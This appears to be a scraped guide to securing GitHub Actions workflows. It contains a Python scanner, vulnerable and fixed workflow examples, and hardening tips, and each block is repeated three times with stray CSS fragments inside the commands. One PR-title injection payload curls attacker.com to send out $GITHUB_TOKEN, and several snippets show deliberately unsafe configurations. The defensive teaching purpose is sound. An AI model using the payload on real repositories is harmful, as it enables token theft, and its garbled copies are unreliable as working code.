$ import requests
import yaml
import re def scan_workflow(workflow_content): issues = [] try: workflow = yaml.safe_load(workflow_content) except yaml.YAMLError: return issues if not workflow or 'jobs' not in workflow: return issues for job_name, job in workflow.get('jobs', {}).items(): for step in job.get('steps', []): run_cmd = step.get('run', '') uses = step.get('uses', '') # Check for unpinned actions if uses and '@' in uses and not re.match(r'.+@[a-f0-9]{40}$', uses): if not uses.endswith(('@v4', '@v3', '@v2', '@v1')): issues.append({ 'type': 'unpinned_action', 'severity': 'medium', 'details': f'Unpinned action: {uses}' }) # Check for script injection if '${{' in run_cmd and any( ctx in run_cmd for ctx in [ 'github.event.issue.title', 'github.event.pull_request.title', 'github.event.comment.body', 'github.head_ref' ] ): issues.append({ 'type': 'script_injection', 'severity': 'critical', 'details': f'Potential script injection in run command' }) # Check for secrets in logs if 'echo' in run_cmd and '${{' in run_cmd and 'secrets.' in run_cmd: issues.append({ 'type': 'secret_exposure', 'severity': 'critical', 'details': 'Secret potentially echoed to logs' }) return issues
import requests
import yaml
import re def scan_workflow(workflow_content): issues = [] try: workflow = yaml.safe_load(workflow_content) except yaml.YAMLError: return issues if not workflow or 'jobs' not in workflow: return issues for job_name, job in workflow.get('jobs', {}).items(): for step in job.get('steps', []): run_cmd = step.get('run', '') uses = step.get('uses', '') # Check for unpinned actions if uses and '@' in uses and not re.match(r'.+@[a-f0-9]{40}$', uses): if not uses.endswith(('@v4', '@v3', '@v2', '@v1')): issues.append({ 'type': 'unpinned_action', 'severity': 'medium', 'details': f'Unpinned action: {uses}' }) # Check for script injection if '${{' in run_cmd and any( ctx in run_cmd for ctx in [ 'github.event.issue.title', 'github.event.pull_request.title', 'github.event.comment.body', 'github.head_ref' ] ): issues.append({ 'type': 'script_injection', 'severity': 'critical', 'details': f'Potential script injection in run command' }) # Check for secrets in logs if 'echo' in run_cmd and '${{' in run_cmd and 'secrets.' in run_cmd: issues.append({ 'type': 'secret_exposure', 'severity': 'critical', 'details': 'Secret potentially echoed to logs' }) return issues
import requests
import yaml
import re def scan_workflow(workflow_content): issues = [] try: workflow = yaml.safe_load(workflow_content) except yaml.YAMLError: return issues if not workflow or 'jobs' not in workflow: return issues for job_name, job in workflow.get('jobs', {}).items(): for step in job.get('steps', []): run_cmd = step.get('run', '') uses = step.get('uses', '') # Check for unpinned actions if uses and '@' in uses and not re.match(r'.+@[a-f0-9]{40}$', uses): if not uses.endswith(('@v4', '@v3', '@v2', '@v1')): issues.append({ 'type': 'unpinned_action', 'severity': 'medium', 'details': f'Unpinned action: {uses}' }) # Check for script injection if '${{' in run_cmd and any( ctx in run_cmd for ctx in [ 'github.event.issue.title', 'github.event.pull_request.title', 'github.event.comment.body', 'github.head_ref' ] ): issues.append({ 'type': 'script_injection', 'severity': 'critical', 'details': f'Potential script injection in run command' }) # Check for secrets in logs if 'echo' in run_cmd and '${{' in run_cmd and 'secrets.' in run_cmd: issues.append({ 'type': 'secret_exposure', 'severity': 'critical', 'details': 'Secret potentially echoed to logs' }) return issues
# VULNERABLE — attacker controls PR title
- name: Check PR title run: | echo "PR Title: ${{ github.event.pull_request.title }}" if [[ "${{ github.event.pull_request.title }}" == *"feat"* ]]; then echo "Feature PR" fi
# VULNERABLE — attacker controls PR title
- name: Check PR title run: | echo "PR Title: ${{ github.event.pull_request.title }}" if [[ "${{ github.event.pull_request.title }}" == *"feat"* ]]; then echo "Feature PR" fi
# VULNERABLE — attacker controls PR title
- name: Check PR title run: | echo "PR Title: ${{ github.event.pull_request.title }}" if [[ "${{ github.event.pull_request.title }}" == *"feat"* ]]; then echo "Feature PR" fi
feat"; -weight: 500;">curl attacker.com/steal?token=$GITHUB_TOKEN; echo "
feat"; -weight: 500;">curl attacker.com/steal?token=$GITHUB_TOKEN; echo "
feat"; -weight: 500;">curl attacker.com/steal?token=$GITHUB_TOKEN; echo "
- name: Check PR title env: PR_TITLE: ${{ github.event.pull_request.title }} run: | echo "PR Title: $PR_TITLE" if [[ "$PR_TITLE" == *"feat"* ]]; then echo "Feature PR" fi
- name: Check PR title env: PR_TITLE: ${{ github.event.pull_request.title }} run: | echo "PR Title: $PR_TITLE" if [[ "$PR_TITLE" == *"feat"* ]]; then echo "Feature PR" fi
- name: Check PR title env: PR_TITLE: ${{ github.event.pull_request.title }} run: | echo "PR Title: $PR_TITLE" if [[ "$PR_TITLE" == *"feat"* ]]; then echo "Feature PR" fi
# RISKY — tag can be moved to point to malicious code
- uses: some-action/setup@v2 # SAFE — pinned to specific commit SHA
- uses: some-action/setup@a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0
# RISKY — tag can be moved to point to malicious code
- uses: some-action/setup@v2 # SAFE — pinned to specific commit SHA
- uses: some-action/setup@a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0
# RISKY — tag can be moved to point to malicious code
- uses: some-action/setup@v2 # SAFE — pinned to specific commit SHA
- uses: some-action/setup@a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0
# RISKY — gives ALL permissions
permissions: write-all # BETTER — principle of least privilege
permissions: contents: read pull-requests: write
# RISKY — gives ALL permissions
permissions: write-all # BETTER — principle of least privilege
permissions: contents: read pull-requests: write
# RISKY — gives ALL permissions
permissions: write-all # BETTER — principle of least privilege
permissions: contents: read pull-requests: write
# DANGEROUS — secrets available to fork PRs
on: pull_request_target: types: [opened, synchronize] jobs: build: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - run: -weight: 500;">npm test env: API_KEY: ${{ secrets.API_KEY }} # Exposed to forks!
# DANGEROUS — secrets available to fork PRs
on: pull_request_target: types: [opened, synchronize] jobs: build: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - run: -weight: 500;">npm test env: API_KEY: ${{ secrets.API_KEY }} # Exposed to forks!
# DANGEROUS — secrets available to fork PRs
on: pull_request_target: types: [opened, synchronize] jobs: build: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - run: -weight: 500;">npm test env: API_KEY: ${{ secrets.API_KEY }} # Exposed to forks!
# RISKY — downloading artifacts from untrusted sources
- uses: actions/download-artifact@v4 with: name: build-output
- run: ./build-output/deploy.sh # Could be poisoned
# RISKY — downloading artifacts from untrusted sources
- uses: actions/download-artifact@v4 with: name: build-output
- run: ./build-output/deploy.sh # Could be poisoned
# RISKY — downloading artifacts from untrusted sources
- uses: actions/download-artifact@v4 with: name: build-output
- run: ./build-output/deploy.sh # Could be poisoned
# Quick check: find all unpinned actions in your workflows
grep -r 'uses:' .github/workflows/ | grep -v '@[a-f0-9]\{40\}' | grep '@'
# Quick check: find all unpinned actions in your workflows
grep -r 'uses:' .github/workflows/ | grep -v '@[a-f0-9]\{40\}' | grep '@'
# Quick check: find all unpinned actions in your workflows
grep -r 'uses:' .github/workflows/ | grep -v '@[a-f0-9]\{40\}' | grep '@' - Pin all actions to SHA — not tags
- Use permissions key — restrict to minimum needed
- Never interpolate user input in run — use env vars
- Separate pull_request and pull_request_target — understand the difference
- Review third-party actions — check their source code - GitHub Security Scanner
- Git Secrets Audit
